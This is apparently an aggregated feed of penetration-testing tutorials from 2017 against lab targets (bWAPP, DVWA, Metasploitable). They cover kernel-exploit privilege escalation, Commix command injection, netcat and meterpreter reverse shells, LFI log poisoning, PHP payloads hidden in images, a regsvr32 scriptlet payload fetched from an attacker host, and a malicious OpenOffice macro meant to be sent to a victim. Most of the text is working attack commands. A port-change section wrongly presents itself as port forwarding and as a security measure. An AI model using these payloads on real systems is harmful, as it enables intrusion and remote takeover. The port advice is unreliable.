Now from our nmap result we have got port 22 open which is for ssh login. So open it in kali terminal
sshmargo@192.168.1.6
And password is god which we got from last result. Good we have access of our lab now.


Our next step is to find the kernel version of lab and for that type
lsb_release–a
it gives that Ubuntu 14.04 is used and to get the root access of  lab, we will use the particular exploit made for this kernel version i.e. 39166. So first download it and then compile by command
gcc 39166 –o 39166
after compiling copy it to var/www/html now run the commands given below to get root access
cd /tmp
wget http://192.168.1.7/39166
chmod 777 39166
./39166
As we have root access, finally first challenge is completed. Now it’s time to find the flag.


Now we are in root so we will download LinEnum.sh zip file to get the better access of Linux and privilege escalation. After unzipping it, move in to folder and just copy LinEnum.sh file to var/www/html. Perform the following commands with ip of kali linux
wgethttp://192.268.1.7/LinEnum.sh
chmod 777 LinEnum.sh
./LinEnum.sh


It shows all the services running.

Here we get some interesting file which is highlighted in below image. It shows some external server is running.


Now from the process list we see something like ftpserv so we can just search based on that.
Find / -name ftpserv*
Awesome it gives us aftpserv.img file which can prove to be an useful thing.

Now I copied this ftpserv.img file for easy downloading.
Cp /var/lib/libvirt/images/ftpserv.img /var/www/html
Chmod777  /var/www/hmtl/ftpserv.img


Here I downloaded that ftpserv.img file in my kali linux.
wget http://192.168.1.6/ftpserv.img


This time I have checked the file type of downloaded file and then extracted it
fileftpserv.img
losetup /dev/loop0 /root/ftvserv.img -0 $((63*512))


It extracted the ftpserv.img  and it has some files inside it. When I opened garbage folder there I saw a flag.img file which is what we need i.e. flag.


Open garbage folder in terminal and make directory flag for extracting flag.img in it.
mkdir flag
mount –t ext2 flag.img flag
now I open flag folder and here I could see all extracted data of flag.img even hidden files also.
cd flag
ls –la
from the list of files I open .trash folder
cd .trash
ls –la
and here we can see that finally we got our flag but it’s in other file type so let’s check it
fileflag.txt.gpg
this shows that task is not completed yet and we still have encrypted flag.


Though we have our flag but we do not have key for decryption. So looking around it I found a hint.txt file of flag which probably could have key to open it. So let’s open it
cat hint.txt
Here we can see that it gives 2 links.

Now we open the above links in Firefox browser. And we get 2 movies which has only one thing in common i.e. actor jonny lee miller.



After doing Google search about these movies and jonny lee miler I came to know that in hacker’s movie he has aliases like zerocool, crash over ride etc. so by using cup software I created a dictionary. By running following command in .trash folder. Simultaneously it’s decrypting our encrypted flag also.
for x in $( cat /root/Desktop/cup/zerocool.txt) ; do
>echo [x] trying $x
>gpg –output flag.txt –passphrase $x –decrypt flag.txt.gpg
>done
At the bottom it gives that flag.txt exists.


Now again running ls command it reflects off flag.txt file which is basically our flag. So at last type the given command.
cat flag.txt
Fantastic, after all the difficulties we successfully got our flag.

Exploit Command Injection Vulnearbility with Commix and Netcat

February 6, 2017, 5:59 am
$
0
0
In this article I will show how easily you can hack a web server using commix tool if the severe is suffering from OS command injection vulnerbility.

Attaker: kali Linux
Target: bwapp

Download it from here and install and run it with VM ware.


Being an attacker browser target IP in browse:192.168.0.105/bwapp, now Login with bee:bug as credential and select OS command injection from choose your bug; then click on hack.


Here requested web page gets open where you can execute any command. Now I will start burp suite to capture the request. In order to start intercept click the proxy tab and turn on intercept; don’t forget to run proxy inside the browser. Now give any command like IP: 192.168.0.105 and click on lookup.


Inside burp suite you will get the post request has been captured. Here we have victim’s details which will be helpful for making an attack on its web server. Now select the whole data from POST…….&form=submitthen copied it and saved in a text file. I had saved it as os.txt and further use it with commix.


In previous tutorial we had used manual step inside commix to execute the given command for making attack but here the step is more easy and convenience to apply for making an attack. Now Type following command for commix to start attack.

Commix –r /root/Desktop/os.txt

Hit enter or press Y as reply of every question.

From given screenshot you can see I have got the victim’s shell and here I had executed following command to retrieve victim’s detail.

Whoami
Id


In next step I have tried to connect victim from netcat shell; open other terminal and type following command to start listener through netcat : nc –lvp 4444
Now start reverse tcp connection using netcat through commix and follow below steps.
commix(os_shell) > reverse_tcp
commix(reverse_tcp) > set LHOST 192.168.0.104
commix(reverse_tcp) > set LPORT 4444
 Option asks by commix to set backdoor for connection Type ‘1’ for netcat reverse TCP shells.
commix(reverse_tcp) > 1
Option asks by commix to set target Type ‘1’ to use default netcat on target host.
 commix(reverse_tcp) >1


On other terminal you will get reverse connection on netcat again type following command

Whoami
Id

Here you will see the result of commix shell and netcat is exactly same.


Command Injection to Meterpreter using Commix

February 6, 2017, 7:33 am
$
0
0
In this article I will show how easily you can hack a web server using commix tool if the severe is suffering from OS command injection vulnerbility and try to access meterpreter shell.

Attaker: kali Linux
Target: bwapp
Download it from here and install and run it with VM ware.


Being an attacker browser target IP in browse:192.168.0.105/bwapp, now Login with bee:bug as credential and select OS command injection from choose your bug; then click on hack.


Here requested web page gets open where you can execute any command. Now I will start burp suiteto capture the request. In order to start intercept click the proxy tab and turn on intercept; don’t forget to run proxy inside the browser. Now give any command like IP: 192.168.0.105and click on lookup.


Inside burp suite you will get the post request has been captured. Here we have victim’s details which will be helpful for making an attack on its web server. Now select the whole data from POST……. &form=submit then copied itand saved in a text file. I had saved it as os.txt and further use it with commix.


In previous tutorial we had used manual step inside commix to execute the given command for making attack but here the step is more easy and convenience to apply for making an attack. Now Type following command for commix to start attack.

Commix –r /root/Desktop/os.txt

Hit enter or press Y as reply of every question. From given screenshot you can see I have got the victim’s shell and here I had executed following command to retrieve victim’s detail.

Whoami


Now start reverse tcp connection using below steps.
commix(os_shell) > reverse_tcp
commix(reverse_tcp) > set LHOST 192.168.0.104
commix(reverse_tcp) > set LPORT 8888
 Option asks by commix to set backdoor for connection Type ‘2’ for other reverse TCP shells.
commix(reverse_tcp) > 2
Option asks by commix to set target Type ‘5’ to use php meterpreter reverse tcp shell.
 commix(reverse_tcp) >5


Copy the highlighted text and paste it on anther terminal which will load metasploit framework and start multi handler automatically at background.


Once the metasploit get loaded then move back to previous terminal where commix is running hit enter here.


From given screenshot you can see I have got meterpreter shell.
Meterpreter>sysinfo

Webshell to Meterpreter

February 8, 2017, 8:48 am
$
0
0
Through this article you will learn how we can achevie meterpreter shell after uploading a PHP backdoor script in victim’s PC. You can read previousarticle to upload PHP web shell in a web server.

Type msfconsole and load metasploit framework
Now type use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)>set lhost 192.168.0.104 
msf exploit (web_delivery)>set srvport  8081
msf exploit (web_delivery)>exploit


Copy the highlighted text shown in below window 


Meterpreter shell using b374k

Now from given screenshot you can see here we have successfully uploaded b374k script and now paste above copied malicious code and execute it as command.


When above code gets execute you will get meterpreter session 1.
msf exploit (web_delivery)>session –I 1
meterpreter> sysinfo


Meterpreter shell using c99 shell

Repeat the same process; after uploading c99 script in a web server now paste that PHP code which we have got through web delivery inside the c99 shell script and execute as command.


This will give you another meterpreter session.
meterpreter> sysinfo


Meterpreter shell using Weevely

Once you have uploaded weevely backdoor inside web server now repeat the same processinside weevely as I have done and past malicious PHP code which we have got through web delivery and hit enter.


Here one more session will get opened for meterpreter shell.
meterpreter> sysinfo


Meterpreter shell using wso2.5.1.php

Now next step is to get meterpreter shell through wso2.5.1.php script and again repeat the same step for web delivery to get the malicious PHP code and pastthat code under this script and execute as command.


CONGRATS!!!  we have successfully access meterpreter shell through different php script Here we have again a meterpreter session
meterpreter> sysinfo

Web Server Exploitation with LFI and File Upload

February 11, 2017, 7:13 am
$
0
0
In this article you will learn how to bypass file uploading vulnerability in high security through FILE INCLUSION vulnerability. As well as how to bypass local file inclusion to get reverse connection of victim’s Pc.

Attacker: kali Linux
Target: DVWA

First you need to download Exif Piot toolfrom here. This is a GUI tool for windows users which allow adding exif data and Meta data inside a JPEG, PNG and GIF images.


Now open exif pilot and insert any image to hide malicious comment inside it; from screenshot you can see I have choose shell.png image and then click on EDIT EXIF/IPTC.


Further inside comment text field type as malicious code and click on ok.


Here the exif data has been edited successfully inside the image. This tool replaces the malicious image from the original image in the same folder and sent the original image into recycle bin.


Now explore target IP in browser and login into DVWA with admin: password as credential. Set security level high.


Choose vulnerability file upload to upload the malicious image in the web server application and now browse your malicious image shell.png then click on upload.


It will show the path of uploaded image copy the highlighted path.


Now open the copied path in browser where you will find the uploaded image.


In order to execute the malicious code we need to change the category of vulnerability as well as security level also so that we can execute the hidden comment inside the image.
Now set security level low.

In order to bypass file uploading vulnerability in high security of DVWA we need to set other vulnerability and I have select File Inclusion for this purpose.

File Inclusion allow users to execute any file through URL as I have described above.


Now past the above copied path of uploaded image inside the URL as shown in screenshot.
http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.png

Here it has given warning system (): cannot execute blank command which means we need to add some command for execution hence through URL we will be able to execute any command.


http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.png&c=ifconfig
Here I try to check network configuration of victim’s Pc and you can see the result of network configuration from screenshot.


http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.png&c=dir
Here you can view the directories which I have got by executing dir command in URL.


Now next I will try to achieve meterpreter session using Kali Linux
Type msfconsoleand load metasploit framework.
use exploit/windows/misc/regsvr32_applocker_bypass_server
msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.103
msf exploit(regsvr32_applocker_bypass_server) > set lport 1234
msf exploit(regsvr32_applocker_bypass_server) > exploit

regsvr32 /s /n /u /i:http://192.168.1.103:8080/7vnJTV4ONLKkU19.sct scrobj.dll
Copy the above malicious code and send it to victim.


Here paste above .dll malicious code inside the URL and when you will run the code in the browser; attack will get victim’s meterpreter session on his kali Linux.
http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.png&c=regsvr32 /s /n /u /i:http://192.168.1.103:8080/7vnJTV4ONLKkU19.sct scrobj.dll


Meterpreter session 1 will get open
Meterpreter>sysinfo


Second Way

In second part we will try to combine a malicious PHP file with an image, further use that malicious image for uploading in web application server and then bypass that image in same manner as performed above.

Here first you need to download any .png/.jpg/.gif image and save it on Desktop. Inside Kali Linux I have downloaded an image and save it with the name“a.png” on the desktop. Now open the terminal and type following command to generate a PHP code inside “a.png” image.

Msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.1.103 lport=4444 >> /root/Desktop/a.png



Let’s verify whether the image contains the malicious code inside it or not
Cat /root/Desktop/a.png

When you will scroll down the window screen, here you will find that the end part of image contains PHP code. It means we have successfully created the malicious image which ready to upload inside the web application server.


Now repeat the above process to upload the file inside DVWA with security level high. From given screenshot you can see my “a.png” image is successfully uploadedinside the web server.
Copy the highlighted path where image is uploaded.


Before executing image in web server start multi/handler in background inside the kali Linux
msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.103
msf exploit(handler) > set lport 4444
msf exploit(handler) >exploit


Again set security level low in DVWA and turn on the File Inclusion vulnerabilityand repeat the same process as above, now the paste the above copied pathof uploaded image inside the URL and execute it which will provides reverse connection on kali Linux.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/a.png


meterpreter > sysinfo
I have got meterpreter session of victim PC

Exploit Webserver through Log Injection with LFI

February 13, 2017, 11:03 pm
$
0
0
Through this article you will see how to create local file inclusion log posioning inside the target machine and gain unauthourized access with help of apache access .log file.

Attacker: Kali Linux
Target: Metasploitable 2

Connect the target using SSH  service as shown below in the following image
ssh msfadmin@192.168.1.8

Now login with user as “sudo” and create a folder “lfi” inside /var/www
cd /var/www

mkdir lfi


Now create a PHP file which will allow the user to include a file through file parameter. Hence using file parameter we can execute a file that contains malicious code to make unauthorized access is target PC.

   $file = $_GET['file'];
   if(isset($file))
   {
       include("$file");
   }
   else
   {
       include("index.php");
   }
   ?>
Now I have saved above PHP code inside a text file as lfi.php andshare this file.


In order to download lfi.PHP inside the lfi directory type following command
Wget http://192.168.1.25/lfi.php


Now let’s browse following URL: 192.168.1.8/lfi/lfi.php
In given screenshot you can see when I have browse lfi.php file; it has shown some error which looks like local file inclusion vulnerability.


Now I will try to open apache access.log file and to explore this file first I will give read permission to apache2 and then include the acess.log file.


Now include the acess.log file as file parameter and give following URL inside browser.
192.168.1.8/lfi/lfi.php?file=/var/www/apachae2/access.log
Now turn on burp suite to capture the request of same web page


Here you will get intercepted data where we need to inject our cmd comment inside user-agent by replace highlighted data.



Add cmd comment inside user_Agent and send the request with GET parameter  192.168.1.8/lfi/lfi.php?file=/var/www/apachae2/access.log&c=psas shown in the below image. Then clickon forward.


Here it will dump the log data as well as execute comment given through cmd. From screenshot you can view both log as well as process state.


In same manner execute lsb_release –athrough cmd and view the result from inside the given screenshot.

5 ways to Exploit LFi Vulnerability

February 15, 2017, 9:21 am
$
0
0
The main aim of writing this article is to share the idea of making an attack on a web server using various techniques when the server is suffering from file inclusion vulnerability. As we all are aware of LFI vulnerability which allows the user to include a file through URL in the browser. In this article I have used two different platform bWAPPand DVWA which contains file inclusion vulnerability and through which I have performed LFI attack in FOUR different ways.

Basic local file inclusion

Open target IP in the browser and login inside BWAPP as bee: bug now choose the bug remote & local file Inclusion then click on hack.


Here the requested web page which suffering from RFI & LFI Vulnerability gets open. Where you will find a comment to select a language from the given drop down list, and when you click on go button the selected language file get included in URL. To perform basic attacks manipulate

http://192.168.1.101/bWAPP/rlfi.php?language=lang_en.php&action=gointo 192.168.1.101/bWAPP/flfi.php?language=/etc/passwd

In basic LFI attack we can directly read the content of a file from its directories using (../) or simply (/), now if you will notice the given below screenshot you will find that I have access the password file when the above URL is executed in the browser.


Null byte

In some scenario the above basic local file inclusion attack may not work due to high security level. From below image you can observe now that I got fail to read the password file when executing the same path in URL. So when we face such kind of problem then go for NULL BYTE attack.

Now turn on burp suite to capture the browser request then select proxy taband start intercept. Do not forget to set browser proxy while making use of burp suite


Now inside burp suite send the intercepted data into repeater.


Inside repeater you can do analysis of sent request and response generated by it. From screenshot it will be clear that /etc/passwdis not working and I am not able to read the password file.  


From following screenshot you can see I had forward the request by adding null character ()at the end of directory /etc/passwd and click on go tab. Then on the right sight of window the password file get open as response.


Base64 encoded

Now there is another way to exploit LFI when the security level is high and you are unable to view the PHP file content, and then use the following PHP function.

http://192.168.1.101/bWAPP/rlfi.php?language=php://filter/read=convert.base64-encode/resource=/etc/passwd

Here from the screenshot you can see the content of password file is encoded into base64; copy the whole encoded text.


I am using hackbar which a Firefox plugin to decode above copied text.


Now a pop-up box will get open past the copied encoded text inside it and click on ok


From the given screenshot you can view the result and read the content of password file.


PHP Input

Using PHP input function we will execute injected PHP code to exploit LFI vulnerability. With the help of hackbarI am going to perform this task in which first we need to load the URL of the targeted web page as you can see in the given screenshot.


Now manipulate above URL using PHP input function

http://192.168.1.101/bWAPP/rlfi.php?language=php://input&cmd=ls

Then select the check box to enable Post data which will forward the post request and add cmd comment in given text areaas shown in following screenshot, finally click on execute.

This will show directories of victim PC.


Now time to connect the victim through reverse connection; open terminal in kali Linux and type msfconsoleto start metasploit framework.
Now type use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.0.104 
msf exploit (web_delivery)>set srvport  8081
msf exploit (web_delivery)>exploit
Copy the highlighted text shown in below window


Paste above copied PHP code inside the URL as shown in the image and execute it


When above URL get execute the attacker got victim’s meterpreter session inside the metasploit.
msf exploit (web_delivery)>session –I 1
meterpreter> sysinfo


Proc/self/environ
If the server is outdated then to exploit it through LFI we can include proc/self/environ file that stores User_Agent where we will place our PHP code for executing CMD command.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=proc/self/environ


Now start burp suite and capture the browser request and send the fetch data into repeater.


Add cmd comment  inside user_Agent and send the request with GET parameter  192.168.1.8/lfi/lfi.php?file=/var/www/apachae2/access.log&cmd=id as shown in the below image. On the right side of window you can see the highlight result as response.

Search

File Upload Exploitation in bWAPP (Bypass All Security)

February 16, 2017, 9:20 am
$
0
0
In this article you will learn how to bypass all three security level of unrestricted file upload inside the bWAPP and if you want to know more about the various kind of file uploading vulnerability read previousarticle that may help you to understand this article more clearly.

LOW SECURITY

Open the target IP in browser: 192.168.0.106/bWAPP/login.php. Enter user and password as bee and bug respectively.


Set security level low, from list box chooses your bug select Unrestricted File Upload now and click on hack.


Create PHP backdoor using msfvenom and start multi handler in the background; now from screenshot you can see I have browse meter.php for uploading as an image inside the web server.


When the image gets successfully uploaded on the web server it will send the link of directory where image is saved to view the uploaded image. Since we haven’t upload any real image therefore we will try to execute our PHP backdoor by making click on the link “here”.


When victim click the above link “here” we will get victim’s reverse connection through meterpreter session inside the metasploit framework.
From screenshot you can see metasploit session 1 is opened.


MEDIUM SECURITY

As the level of security is change so here we cannot able to perform same procedure as above. Although here you just need to change only the extension of your PHP backdoor to bypass medium security. If you notice the image given below here you will find that I have browse meter.php3 for uploading

Now repeat the same step run multi handler at background and make click on the given link “here” to receive metrpreter session.


GREAT!!! From screenshot you can see metasploit session 2 is opened


HIGH SECURITY
Now we have enter into high security where above two file uploading attack will get failed so here again you need to make some small changes  into the extension of PHP backdoor file for uploading it in the web server.
From screenshot you can read the file name high.php.png which I have browse for uploading.


Here our file is successfully uploaded now make right click on the link “here” to copy link location and keep multi handler running at the background.


To bypass high security of file uploading in bWAPP we need to switch the bug as well as security level.
Set security level low and choose the bug remote & local file Inclusion then click on hack.

Here the requested web page which suffering from RFI & LFI Vulnerability gets open. Where you will find a comment to select a language from the given drop down list, and when you click on go button the selected language file get included in URL.

 Since I have uploaded the PHP backdoor shell in high security but execute that backdoor through low security with help of LFI vulnerability. Now just manipulate the following URL as shown in screenshot.

http://192.168.0.106/bWAPP/rlfi.php?language=lang_en.php&action=go into 192.168.0.106/bWAPP/rlfi.php?language=images/high.php.png


When above URL is executed in the browser you will get victim’s reverse connection inside metasploit.
Congrats!!! From screenshot you can see metasploit session 3 is opened.
Hence we have bypassed all three security level inside bWAPP

Exploiting Remote PC with Apache OpenOffice Text Document Malicious Macro Execution

February 16, 2017, 10:34 am
$
0
0
This module generates an Apache OpenOffice Text Document with a malicious macro in it. To exploit successfully, the targeted user must adjust the security level in Macro Security to either Medium or Low. If set to Medium, a prompt is presented to the user to enable or disable the macro. If set to Low, the macro can automatically run without any warning. The module also works against LibreOffice.

Exploit Targets
Apach Open Office on Windows

Requirement
Attacker: kali Linux
Victim PC: Windows 10


Open the terminal in kali Linux and type msfconsole to load metasploit framework.


Now type use exploit/multi/misc/openoffice_document_macro
msf exploit (openoffice_document_macro)>set payload windows/meterpreter/reverse_tcp
msf exploit (openoffice_document_macro)>set lhost 192.168.0.104 (IP of Local Host)
msf exploit (openoffice_document_macro)>set srvhost 192.168.01.04
msf exploit (openoffice_document_macro)>set lport 4444
msf exploit (openoffice_document_macro)>exploit
 From the screenshot you can see the highlighted text is showing the path of malicious odt file.


The malicious odt File had been generated successfully which is stored on your local computer inside following path:
/root/.msf4/local/msf.odt


Now send your msf.odt files to victim, as soon as he download and open it, you can access meterpreter shell on victim computer.

Web Server Exploitation with SSH Log Poisoning through Lfi

February 19, 2017, 11:41 pm
$
0
0
In this article you will learn how make unauthorized access in a web server if it is suffering from local file inclusion vulnerability with help of auth log file. To perform this attack first you need to read my previous article which will help you to create local file inclusion vulnerability manually.

Attacker: Kali Linux
Target: Metasploitable 2

Open terminal in your kali Linux and connect the target using SSH service
ssh msfadmin@192.168.1.105

From screenshot you can see I am connected with target PC, now type following command to check the permission for auth.log file
Ls –l /var/log/auth.log


Now if you notice the given screenshot again you will find that the highlighted text is showing read writepermission had been given to auth.log file.


Since we know that the auth.log file has read permission therefore type following command to view its logs.
Tail –f /var/log/auth.log

The highlighted text is showing the log for the valid user msfadmin.


Now open another terminal in kali where I will try to connect with web server using fake user name and then confirm whether any log is generated inside auth.log file for invalid user or not.

Ssh hacker@192.168.1.105


When you move back to your previous terminal you find it has created a log for invalid user hacker which you can also check in the given screenshot.


Hence it is confirm that auth.log file generates log for every failed and pass login when we try to connect with web server. Taking advantage of this feature now I will send PHP code as fake user and it will get added automatically in auth.log file as new log.

Ssh ’@192.168.1.105


Again when you check its log, you will find the PHP code has been added as new log.


Since I have already created LFI vulnerability manually inside the web server, so if you want to create LFI vulnerability view above link of previous article.
In given screenshot you can see when I have browse lfi.php file; it has shown some error which looks like local file inclusion vulnerability.

Now include the auth.log file as file parameter and give following URL inside browser.
192.168.1.105/lfi/lfi.php?file=/var/log/auth.log

From screenshot you can read the warning cannot execute blank command, it means our PHP code which was containing CMD comment is successfully injected now only we need to send any command as parameter



192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=ps

Here it will dump the data of auth log as well as execute comment given through cmd. From screenshot you can view both log as well as process state.


In same way execute pwd through cmd and view the result from inside the given screenshot.

How to Secure Your Port using Port Forwarding

February 20, 2017, 7:27 am
$
0
0
In this article I am going to perform how to use port forwarding in a system which is a process that redirects a communication request from a specific port to another port or host. It is basically allows an outside computer to connect to a computer in a private local area network. Some commonly done port forwarding includes forwarding port 22 for SSH access, forwarding port 80 for web servers and port 21 for FTP. The major advantage is that it provides security to your private network and secure communication
.
Let’s start !!!!

HTTP and HTTPS forwarding
Open ports.conf file from inside /etc/apache2and type following command to read the configuration.
Cat ports.conf


From screenshot you can view the present listening port 80 and 443 for web server.


If an attacker wants to send malicious file through web server he will try to connect with target using port 80 send the phishing page to the target.

In order to protect you from being targeted through phishing page change the port number from 80 and 443 into other number. 

If you notice the following screenshot here you will that I have modified port 80 into 8088 and port 443 into 44343.


FTP port forwarding
Now open the vsftpd.conffile from inside /etc.
From screenshot you can view listen port is 21 by default, to protect yourself from FTP attacks shift the FTP service on other port.


From given below screenshot you will find that I have change port21 into 2121


SSH port forwarding

Open file sshd_config from / etc/ssh/ssd_config
From screenshot you will find that by default port 22 is use as listen port which is badly affected by DDOS attack. Here to protect yourself apply port forwarding techniques on port 22.


From below image, again you will notice that I have change port 22 into port 2222.


Now if you will scan your network with help of NMAP you will find that the services FTP, HTTP and SSH is successfully running on the modified ports.
Nmap –p- -sV 192.168.1.24

Understanding Redirection with Encoding Techniques (Part 1)

February 28, 2017, 7:06 am
$
0
0
A redirect automatically sends website's visitors to some different location or URL; redirection could be either at different location within the same site or a new site or webpage.

Unsecure redirection and forwarding are the outcomes when a web application accepts untrusted inputs that could cause the web application to redirect the request to a URL contained within untrusted/Unvalidated input, we can also call this type of redirection as Unvalidated Redirection.

We are demonstrating the actual concept and types of redirection through a PHP code running under apache server on a local machine running kali Linux. We can also use wamp or xampp server for windows machine to run and execute these codes. For executing our redirection scripts, put the codes in /var/www/htmldirectory: This is the directory pointing to localhost (in our case).
References
 http://php.net/manual/en/function.header.php
https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet
Basic Redirection
On browser type localhost/redirect/home.php

Hover on Redirect Link, pointing to redirection page (re.php). We can see the redirection on clear text format below. (As shown in the figure below). 


When we click on this link, we will be redirected to http://www.hackingarticles.in, as we have coded in our redirection script (re.php).


This is the basic redirection where we are simply redirecting the users from one page to another page through php scripts without considering any security measures in account. The further encoding parameters of redirection are explained below.

URL Encoding
On browser type localhost/hex/home.php (page where we have our scripts)
Hover on Redirect Link, pointing to redirection page (re.php). We can see the redirection on clear text format below.(As shown in the figure below).



Here we are using the same script for the home page but in this redirection we are using simple URL encoding where we can send our URL in URL Encoded format  and the encoded URL is being decoded through the script running on our redirected php page(re.php in this case).
WE can use any online /offline converter for calculating URL encoded value (in this example we are using http://www.meyerweb.com/)
Refer below screenshot for URL encoding.




 Right click on Redirect Link on home.php and copy link location and past the URL in new tab. If we replace the redirected URL with URL encoded value we will land on the same page.


The following is the result


HEX Encoding
Here we are converting the URL in its Hexadecimal Value using Burp suite (you can use any online/offline tool).


Single Hex encoded value of http://www.hackingarticles.in is
%68%74%74%70%3a%2f%2f%77%77%77%2e%68%61%63%6b%69%6e%67%61%72%74%69%63%6c%65%73%2e%69%6e
Right click on Redirect Link on home.php and copy link location and past the URL in new tab. If we replace the redirected URL with single hex encoded value we will land on the same page


The following is the result


Multilevel Encoding
Here we are demonstrating the multilevel encoding where we are re-encoding the pre encoded values.


Double Hex encoded value of http://www.hackingarticles.in is
%25%36%38%25%37%34%25%37%34%25%37%30%25%33%61%25%32%66%25%32%66%25%37%37%25%37%37%25%37%37%25%32%65%25%36%38%25%36%31%25%36%33%25%36%62%25%36%39%25%36%65%25%36%37%25%36%31%25%37%32%25%37%34%25%36%39%25%36%33%25%36%63%25%36%35%25%37%33%25%32%65%25%36%39%25%36%65

Right click on Redirect Link on home.php and copy link location and past the URL in new tab. If we replace the redirected URL with double hex encoded value we will land on the same page.



The following is the result



Base 64 Encoded Redirection

On browser type http://localhost/base64/home.php
Hover on Redirect Link, pointing to redirection page (re.php). Here we are pre encoding our URL to its base 64 encoded value because of which our URL is something which can't be understandable with naked eye .(As shown in the figure below). 



 Below image shows the Base64 encoding of our URL http://www.hackingarticles.in



Base64 encoded value of http://www.hackingarticles.in is
 “aHR0cDovL3d3dy5oYWNraW5nYXJ0aWNsZXMuaW4=”

The following is the output

Viewing all 1812 articles
Browse latest View live
Search
<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>